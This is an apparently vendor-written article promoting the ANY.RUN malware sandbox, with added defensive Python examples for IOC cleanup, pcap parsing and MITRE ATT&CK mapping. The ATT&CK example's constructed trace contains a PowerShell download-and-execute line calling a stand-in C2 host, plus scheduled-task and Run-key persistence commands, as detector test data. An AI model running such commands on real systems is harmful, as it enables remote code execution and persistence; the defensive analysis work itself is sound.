Dynamic malware analysis is a key part of any threat investigation. It involves running a sample in an isolated sandbox environment to monitor its behavior and gather actionable data. Effective analysis must be quick, thorough, and accurate. These five sandbox capabilities will help you achieve that.
1. Interactivity
Being able to interact with the malware and the system in real time is a major advantage in dynamic analysis: you can not only watch the sample execute, but also see how it reacts to your input and trigger behaviors that require a user action.
It also saves time when a payload is delivered the way many phishing campaigns deliver it, as a file hosted on a file-sharing website or inside a password-protected archive, because the analyst can download and open it directly inside the sandbox.
The initial phishing email contains a malicious PDF and the password for the archive
Take a look at this sandbox session in ANY.RUN, which shows how interactivity is used to analyze the entire attack chain, starting with a phishing email carrying a PDF attachment. The link inside the PDF leads to a file-sharing website hosting a password-protected .zip.
The website where the .zip file is hosted
The sandbox lets us download the archive, enter the password (found in the email), and extract its contents to launch the malicious payload.
You can manually enter a password to open protected archives in ANY.RUN
After the executable inside the archive is run, the sandbox immediately detects that the system has been infected with AsyncRAT, a widely used remote access trojan that lets attackers control victims’ machines and steal sensitive data.
ANY.RUN gives a conclusive verdict on every sample
It adds the appropriate tags to the interface and generates a threat report.
Analyze files and URLs in ANY.RUN’s private sandbox environment in real time.
Get a 14-day free trial of Sandbox to test its capabilities.
2. IOC extraction
Collecting relevant indicators of compromise (IOCs) is one of the main tasks of dynamic analysis. Detonating the malware in a live environment makes it reveal C2 server addresses, encryption keys, and other parameters it needs to function and communicate with attackers.
Although malware developers usually encrypt or obfuscate such data, some sandboxing solutions come with advanced IOC collection capabilities that make identifying the malicious infrastructure straightforward.
As part of each analysis session in ANY.RUN, you get a full IOC report
With ANY.RUN, you can quickly collect a variety of indicators, including file hashes, malicious URLs, C2 connections, DNS queries, and more.
Example AsyncRAT configuration extracted by ANY.RUN
The ANY.RUN sandbox goes further: besides listing the indicators collected during a session, it extracts configurations for dozens of popular malware families. See the example malware configuration in this sandbox session.
These configurations are the most reliable source of actionable IOCs: the C2 addresses, ports, and keys they contain are what the sample actually uses, so they can feed detection systems with far less vetting than indicators observed incidentally during execution. Still check them for placeholders such as loopback or private addresses before pushing them to blocklists.
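As an added example (not ANY.RUN’s code and not taken from a real report), here is how an analyst might normalise a sandbox IOC list before it goes into a blocklist or SIEM: classify each string, drop loopback and RFC 1918 addresses that are really the analysis VM’s own network or placeholders in the config, remove duplicates, and defang for reporting. The RAW_IOCS list is constructed, with 203.0.113.7 (a documentation range) standing in for a public C2 address and c2-panel.example.invalid for a C2 host.

```python
"""Normalise a sandbox IOC list before it goes into a blocklist or SIEM.

Added example, not ANY.RUN's code; RAW_IOCS is a constructed list in the
shape a sandbox IOC report presents indicators, not data from a real sample.
"""
import ipaddress
import re
from urllib.parse import urlsplit

RAW_IOCS = [
    "d41d8cd98f00b204e9800998ecf8427e",                                   # MD5
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",   # SHA-256
    "http://c2-panel.example.invalid/gate.php",                          # C2 URL
    "c2-panel.example.invalid",                                          # C2 domain
    "203.0.113.7",        # stand-in for a public C2 address (TEST-NET-3 range)
    "10.0.0.5",           # RFC 1918: the analysis VM's own LAN, not an indicator
    "127.0.0.1",          # loopback placeholder left in a config
    "203.0.113.7",        # duplicate of the C2 address above
    "not an indicator",   # noise that sometimes ends up in exports
]

_HASH_RE = {
    "md5": re.compile(r"^[0-9a-f]{32}$"),
    "sha1": re.compile(r"^[0-9a-f]{40}$"),
    "sha256": re.compile(r"^[0-9a-f]{64}$"),
}
_DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,63}$")
# ipaddress.is_private would also reject the documentation range used as a
# stand-in above, so RFC 1918 is listed explicitly.
_RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_routable(addr):
    """False for loopback, link-local, multicast, unspecified and RFC 1918 addresses."""
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback or ip.is_link_local or ip.is_multicast or ip.is_unspecified:
        return False
    return not any(ip in net for net in _RFC1918)


def classify(raw):
    """Return (kind, normalised value), or None if the string is not an indicator."""
    s = raw.strip()
    low = s.lower()
    for kind, rx in _HASH_RE.items():
        if rx.match(low):
            return kind, low
    try:
        ipaddress.ip_address(s)
        return "ip", s
    except ValueError:
        pass
    if low.startswith(("http://", "https://")) and urlsplit(s).hostname:
        return "url", s
    if _DOMAIN_RE.match(low):
        return "domain", low
    return None


def defang(kind, value):
    """Make an indicator safe to paste into a ticket or chat (hxxp, [.])."""
    if kind == "url":
        netloc = urlsplit(value).netloc
        return value.replace(netloc, netloc.replace(".", "[.]"), 1).replace("http", "hxxp", 1)
    if kind in ("ip", "domain"):
        return value.replace(".", "[.]")
    return value


def normalise(raw_iocs):
    """Classify, drop non-routable hosts and duplicates, and attach a defanged form."""
    seen, out = set(), []
    for raw in raw_iocs:
        item = classify(raw)
        if item is None or item in seen:
            continue
        kind, value = item
        host = urlsplit(value).hostname if kind == "url" else value
        if kind in ("ip", "url"):
            try:
                if not is_routable(host):
                    continue          # sandbox LAN, loopback placeholder, etc.
            except ValueError:
                pass                  # URL host is a domain name, nothing to check
        seen.add(item)
        out.append({"type": kind, "value": value, "defanged": defang(kind, value)})
    return out


if __name__ == "__main__":
    for ioc in normalise(RAW_IOCS):
        print(f"{ioc['type']:7} {ioc['defanged']}")
```

Running it keeps five indicators (MD5, SHA-256, URL, domain, the public address) and drops the duplicate, the LAN and loopback addresses, and the noise line. The routability check is deliberately narrow: a real pipeline would also exclude its own egress IPs and well-known benign hosts that samples contact during execution.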
3. MITRE ATT&CK mapping
Preventing attacks on your infrastructure isn’t just about proactively hunting for the IOCs attackers use. A longer-lasting approach is to understand the tactics, techniques, and procedures (TTPs) of the malware targeting your industry.
The MITRE ATT&CK framework helps you map these TTPs so you can see what the malware is doing and how it fits into the larger threat picture. Understanding TTPs lets you build stronger defenses tailored to your organization and stop attackers at the door.
TTPs of the AgentTesla malware sample analyzed in the ANY.RUN sandbox
See the following analysis of an AgentTesla sample. The service logs all the main TTPs used in the attack and provides a detailed description of each one.
All that’s left is to take this threat information and use it to strengthen your security mechanisms.
4. Analysis of network traffic
Dynamic malware analysis also requires a thorough examination of the network traffic generated by the malware.
Analysis of HTTP requests, connections, and DNS queries can provide insight into the malware’s communication with external servers, the type of data being exchanged, and any malicious activity.
Network traffic analysis in the ANY.RUN sandbox
The ANY.RUN sandbox captures all network traffic and lets you view sent and received packets in hex and text form.
The Suricata rule that identifies AgentTesla’s data-stealing activity
Beyond simply logging traffic, it’s critical that a sandbox automatically detects malicious activity. To do this, ANY.RUN uses Suricata IDS rules that scan network activity and report threats.
You can also export the data in PCAP format for detailed analysis using tools like Wireshark.
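The PCAP export can also be processed outside Wireshark. The following added example (not ANY.RUN’s code) walks a classic pcap with only the Python standard library and pulls out DNS query names, HTTP request lines with their Host header, and destination ip:port pairs, which are the network IOCs a sandbox session typically yields. The capture is constructed in memory (one DNS lookup and one HTTP POST from a hypothetical analysis VM at 10.0.0.5 to c2-panel.example.invalid); the builder functions exist only to produce that sample. It handles Ethernet/IPv4 and does no TCP reassembly, so a multi-segment HTTP body or a pcapng export still needs Wireshark.

```python
"""Extract DNS queries and HTTP requests from a classic pcap with the stdlib.
Added example, not ANY.RUN's code. SAMPLE_PCAP is constructed below, not a
real export. Ethernet/IPv4 only; no pcapng, IPv6, fragments or TCP reassembly."""
import struct

ETH_IPV4, IP_TCP, IP_UDP = 0x0800, 6, 17


# --- builders for the constructed capture (not needed to parse a real file) ---
def _ip4(addr):
    return bytes(int(o) for o in addr.split("."))

def _frame(src, dst, proto, l4):
    """Ethernet (zeroed MACs) + IPv4 header (checksum left 0) + transport payload."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0x1234, 0x4000,
                         64, proto, 0, _ip4(src), _ip4(dst))
    return b"\x00" * 12 + struct.pack("!H", ETH_IPV4) + ip_hdr + l4

def _udp(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload

def _tcp(sport, dport, payload):
    # data offset 5 (20-byte header), flags PSH|ACK, checksum left 0
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload

def _dns_query(name):
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", 0xBEEF, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def build_pcap(frames):
    """Classic little-endian pcap: 24-byte global header, 16-byte record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out

SAMPLE_PCAP = build_pcap([
    _frame("10.0.0.5", "10.0.0.1", IP_UDP, _udp(51000, 53, _dns_query("c2-panel.example.invalid"))),
    _frame("10.0.0.5", "203.0.113.7", IP_TCP, _tcp(51001, 80,
           b"POST /gate.php HTTP/1.1\r\nHost: c2-panel.example.invalid\r\n"
           b"User-Agent: Mozilla/4.0\r\nContent-Length: 0\r\n\r\n")),
])


# --- parser -------------------------------------------------------------------
def _dns_qname(dns, off=12):
    """Read the first question name; queries carry no compression pointers."""
    labels = []
    while off < len(dns) and dns[off]:
        n = dns[off]
        labels.append(dns[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n
    return ".".join(labels)

def extract_network_iocs(pcap):
    """Return DNS query names, 'METHOD host/path' strings and destination ip:port pairs."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap (pcapng exports need a different reader)")
    if struct.unpack(end + "I", pcap[20:24])[0] != 1:
        raise ValueError("only the Ethernet link type is handled")
    iocs = {"dns": [], "http": [], "hosts": set()}
    off = 24
    while off + 16 <= len(pcap):
        incl = struct.unpack(end + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_IPV4:
            continue
        ihl = (frame[14] & 0x0F) * 4                  # IPv4 header length in bytes
        proto, dst = frame[23], ".".join(map(str, frame[30:34]))
        l4 = frame[14 + ihl:]
        if len(l4) < 8:
            continue
        dport = struct.unpack("!H", l4[2:4])[0]
        if proto == IP_UDP and dport == 53 and len(l4) > 20:
            iocs["dns"].append(_dns_qname(l4[8:]))
        elif proto == IP_TCP and len(l4) >= 20:
            payload = l4[(l4[12] >> 4) * 4:]           # skip TCP header incl. options
            if payload[:4] in (b"GET ", b"POST", b"HEAD", b"PUT "):
                lines = payload.split(b"\r\n")
                parts = lines[0].decode("ascii", "replace").split(" ")
                method, path = parts[0], (parts[1] if len(parts) > 1 else "")
                host = next((ln.split(b":", 1)[1].strip().decode("ascii", "replace")
                             for ln in lines[1:] if ln.lower().startswith(b"host:")), dst)
                iocs["http"].append(f"{method} {host}{path}")
                iocs["hosts"].add(f"{dst}:{dport}")
    return iocs
```

Calling `extract_network_iocs(SAMPLE_PCAP)` on the constructed capture yields the DNS name c2-panel.example.invalid, the request `POST c2-panel.example.invalid/gate.php`, and the destination 203.0.113.7:80. Matching only on the first bytes of each TCP segment is the same shortcut a quick triage script takes and the reason a Suricata rule with `flow:established,to_server` and HTTP keywords, which works on reassembled streams, catches more than this does.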
Try ANY.RUN advanced network traffic analysis with a 14-day free trial.
5. Advanced process analysis
To understand how the malware executes and what it does to the system, you need detailed information about the processes it spawns. The sandbox you choose should therefore provide advanced process analysis that covers several areas.
A visual graph in the ANY.RUN sandbox showing the execution of the AsyncRAT malware
For example, the process tree visualization in the ANY.RUN sandbox makes it easier to trace the order in which processes are created and terminated and to identify the processes critical to the malware’s operation.
ANY.RUN sandbox flags files with untrusted certificates
You should also be able to check a process’s authenticity by examining its signing certificate, including the issuer, status, and expiration date. Keep in mind that a valid signature only tells you who signed the file; malware signed with a stolen or purchased certificate still needs the rest of the analysis.
XWorm malware process dump available for download in ANY.RUN
Another useful feature is process dumps, which can contain vital information such as the encryption keys the malware uses. A good sandbox lets you download these dumps for further forensic analysis.
ANY.RUN displays a detailed breakdown of PowerShell, JavaScript, and VBScript scripts
A growing trend in cyberattacks is fileless malware that runs only in memory. To catch it, you need access to the scripts and commands executed during the infection process.
Files encrypted by LockBit ransomware during analysis in the ANY.RUN sandbox
Tracking file creation, modification, and deletion events is another important part of any malware investigation. It helps you detect when a process tries to delete or modify files in sensitive locations such as system directories or startup folders.
An example of XWorm using the Run registry key to achieve persistence
Monitoring the registry changes a process makes is critical to understanding malware persistence mechanisms. The Windows registry is a common target because it can be used to run malicious code at startup or alter system behavior.
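Sections 3 and 5 come together in the following added example (not ANY.RUN’s own mapping logic): it takes a constructed process, registry and file event trace, rebuilds the process lineage, decodes the PowerShell -EncodedCommand argument, and maps what it finds to MITRE ATT&CK technique IDs. The events, paths and the c2-panel.example.invalid host are invented for the example, and the handful of rules is illustrative rather than a complete ATT&CK mapping.

```python
"""Map sandbox process/registry/file events to MITRE ATT&CK techniques and show
each hit with its process lineage. Added example, not ANY.RUN's mapping; EVENTS
is a constructed trace (Office macro -> encoded PowerShell -> dropped binary
that persists), not a real report. Rules are illustrative, not exhaustive."""
import base64
import re
from collections import defaultdict

TECHNIQUES = {
    "T1204.002": "User Execution: Malicious File",
    "T1059.001": "Command and Scripting Interpreter: PowerShell",
    "T1027": "Obfuscated Files or Information",
    "T1105": "Ingress Tool Transfer",
    "T1036.005": "Masquerading: Match Legitimate Name or Location",
    "T1547.001": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder",
    "T1053.005": "Scheduled Task/Job: Scheduled Task",
}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed events. The encoded command is built here so it is valid base64 of UTF-16LE.
DROPPED = r"C:\Users\victim\AppData\Roaming\svchost.exe"
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2-panel.example.invalid/a.ps1')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16le")).decode()
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "cmdline": "WINWORD.EXE /n invoice.docm",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"type": "process", "pid": 200, "ppid": 100, "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "process", "pid": 300, "ppid": 200, "image": DROPPED, "cmdline": "svchost.exe"},
    {"type": "registry", "pid": 300, "op": "set", "value": "svchost", "data": DROPPED,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"type": "file", "pid": 300, "op": "create",
     "path": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"type": "process", "pid": 400, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": f"schtasks.exe /create /sc minute /mo 5 /tn Updater /tr {DROPPED}"},
    {"type": "file", "pid": 300, "op": "write", "path": r"C:\Users\victim\Documents\report.docx"},  # benign
]


def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def build_tree(events):
    """Return (pid -> process event, lineage(pid) -> 'root > ... > leaf')."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}

    def lineage(pid):
        chain = []
        while pid in procs:
            chain.append(_name(procs[pid]["image"]))
            pid = procs[pid]["ppid"]
        return " > ".join(reversed(chain))
    return procs, lineage

def decode_powershell(cmdline):
    """Decode the -EncodedCommand/-enc/-e argument (base64 of UTF-16LE) or return None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def map_attack(events):
    """Return {technique_id: [evidence strings]} for the rules below."""
    procs, lineage = build_tree(events)
    hits = defaultdict(list)

    def add(tid, pid, why):
        hits[tid].append(f"pid {pid} [{lineage(pid)}]: {why}")

    for e in events:
        pid = e["pid"]
        if e["type"] == "process":
            img, parent = _name(e["image"]), procs.get(e["ppid"])
            if parent and _name(parent["image"]) in OFFICE and img in INTERPRETERS:
                add("T1204.002", pid, f"{_name(parent['image'])} spawned {img}")
            if img == "powershell.exe":
                add("T1059.001", pid, e["cmdline"][:60])
                decoded = decode_powershell(e["cmdline"])
                if decoded:
                    add("T1027", pid, f"encoded command decodes to: {decoded[:50]}")
                    if re.search(r"download(string|file)", decoded, re.I):
                        add("T1105", pid, "script fetches a remote payload")
            if img in SYSTEM_NAMES and not e["image"].lower().startswith("c:\\windows\\"):
                add("T1036.005", pid, f"{img} running from {e['image']}")
            if img == "schtasks.exe" and "/create" in e["cmdline"].lower():
                add("T1053.005", pid, e["cmdline"][:60])
        elif e["type"] == "registry" and e["op"] == "set" and RUN_KEY.search(e["key"]):
            add("T1547.001", pid, f"{e['key']}\\{e['value']} = {e['data']}")
        elif e["type"] == "file" and e["op"] in ("create", "write") and STARTUP_DIR.search(e["path"]):
            add("T1547.001", pid, f"dropped {e['path']}")
    return dict(hits)

if __name__ == "__main__":
    for tid, evidence in map_attack(EVENTS).items():
        print(tid, TECHNIQUES[tid])
        for line in evidence:
            print("   ", line)
```

On the constructed trace every technique in the table fires, with T1547.001 reported twice (the Run key write and the Startup folder drop). The lineage string attached to each hit is what the process tree in a sandbox gives you visually: it is the parent chain, winword.exe > powershell.exe > svchost.exe, that turns an otherwise ordinary-looking svchost.exe into an obvious masquerade.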
Analyze malware and phishing threats in the ANY.RUN sandbox
ANY.RUN provides a cloud-based malware and phishing analysis sandbox that delivers fast and accurate results to speed up your investigations. Thanks to its interactivity, you can freely interact with the files and URLs you submit, and with the system itself, to study the threat in depth.
You can bring ANY.RUN’s sandbox, with features such as Windows and Linux virtual machines, private mode, and team collaboration, into your organization’s workflow.
Leave a trial request to try out the ANY.RUN sandbox.